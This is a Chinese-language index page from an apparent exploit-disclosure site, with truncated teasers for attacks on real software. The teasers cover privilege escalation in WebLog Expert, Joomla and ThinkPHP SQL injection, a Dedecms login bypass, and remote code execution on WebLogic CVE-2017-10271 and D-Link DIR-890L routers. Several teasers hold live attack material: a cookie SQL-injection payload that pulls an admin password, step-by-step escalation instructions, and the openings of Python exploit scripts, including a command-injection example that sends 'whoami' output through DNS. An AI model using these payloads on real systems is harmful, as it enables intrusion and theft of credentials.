• WebLog Expert Enterprise 9.4 权限提升漏洞

    WebLog Expert Enterprise 9.4 权限提升漏洞
    Software Link: https://www.weblogexpert.com/download.htm Exploit: 1. Login as regular user where WebLog Expert and WebLog Expert Schedule Service are installed 2. Open WebLog Expert and then Schedule 3. Select Add, Next, choose ‘Sample – HTML’ under Profile, Next 4. Check ‘Run command…’ box, fill in ‘Command’ and...阅读全文
    作者:unhonker | 分类:漏洞公布 | 阅读:3,660次 | 标签:
  • Joomla内核SQL注入漏洞(CVE-2018-8045)分析

    Joomla内核SQL注入漏洞(CVE-2018-8045)分析
    我们先看下joomla官网怎么说的: https://developer.joomla.org/security-centre/723-20180301-core-sqli-vulnerability.html User Notes模块由于缺少变量类型转换,导致sql注入的产生。这个漏洞在3.8.6版本被解决。 漏洞介绍很模糊,单从介绍来看,根本不知道这个sql注入产生的位置。 但是既然是3.8.6版本解决的,那我们就来从3.8.6版本的update包中找找思路。 如下是github上joomla的rel...阅读全文
    作者:unhonker | 分类:漏洞公布 | 阅读:481次 | 标签:
  • thinkphp3.2.3注入漏洞

    thinkphp3.2.3注入漏洞
    这个漏洞是基于thinkphp3.2.3开发引起的。 漏洞一 由于oauth_reg方法中调用了login来验证当前会员是否登陆,所以咱们需要注册一个会员帐户再利用该漏洞,这里玩注册用户名和密码均为test123的帐户,然后构造如下cookie: members_bind_info[keyid][0]=exp; members_bind_info[keyid][1]==1 or updatexml(0,concat(0xa,(SELECT password FROM xx_admin limit 1)),0)%23 members_bind_info[...阅读全文
    作者:unhonker | 分类:漏洞公布 | 阅读:1,554次 | 标签:
  • Dedecms任意用户登录

    Dedecms任意用户登录
    ##前台任意用户户登录 global $dsql; if($kp?me==-1){ $this->M_KeepTime = 3600 * 24 * 7; }else{ $this->M_KeepTime = $kp?me; } $formcache = FALSE; $this->M_ID = $this->GetNum(GetCookie("DedeUserID")); $this->M_LoginTime = GetCookie("DedeLoginTime"); $this->fields = array(); $this->isAdmin = FALSE; if(empty($thi...阅读全文
    作者:unhonker | 分类:漏洞公布 | 阅读:981次 | 标签:
  • Weblogic(CVE-2017-10271)漏洞Exp

    Weblogic(CVE-2017-10271)漏洞Exp
    文章作者:莫须有 命令格式:python3 CVE-2017-10271.py url command eg:python3 CVE-2017-10271.py http://test.cve “ping \`whoami\`.dnslog.cve # -*- coding: UTF-8 -*- ''' Created on 2017年12月23日 @author: 莫须有 CVE-2017-10271 EXP ''' import requests,sys headers = { 'User-Agent':'Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 ...阅读全文
    作者:unhonker | 分类:漏洞公布 | 阅读:2,075次 | 标签:,
  • D-Link DIR8xx 远程代码执行漏洞

    D-Link DIR8xx 远程代码执行漏洞
    脚本下载: hnap import requests as rq import struct IP = "192.168.0.1" PORT = "80" # Can differ in different version of routers and versions of firmware # SYSTEM_ADDRESS = 0x1B570 # DIR-890L_REVA_FIRMWARE_PATCH_v1.11B02.BETA01 SYSTEM_ADDRESS = 0x1B50C # DIR-890L_REVA_FIRMWARE_1.10.B07 def _str(address): return stru...阅读全文
    作者:unhonker | 分类:漏洞公布 | 阅读:1,853次 | 标签:
  • Joomla Photo Contest 1.0.2 SQL Injection Vulnerability

    Joomla Photo Contest 1.0.2 SQL Injection Vulnerability
    # # # # # # Exploit Title: Joomla! Component Photo Contest 1.0.2- SQL Injection # Dork: N/A # Date: 25.08.2017 # Vendor Homepage: http://keenitsolution.com/ # Software Link: https://codecanyon.net/item/photo-contest-joomla-extension/13268866 # Demo: http://photo.keenitsolution.com/ # Version: 1.0.2 # Category: Webapps # Tested on: WiN7_x64/KaLiLinu...阅读全文
    作者:unhonker | 分类:漏洞公布 | 阅读:1,612次 | 标签: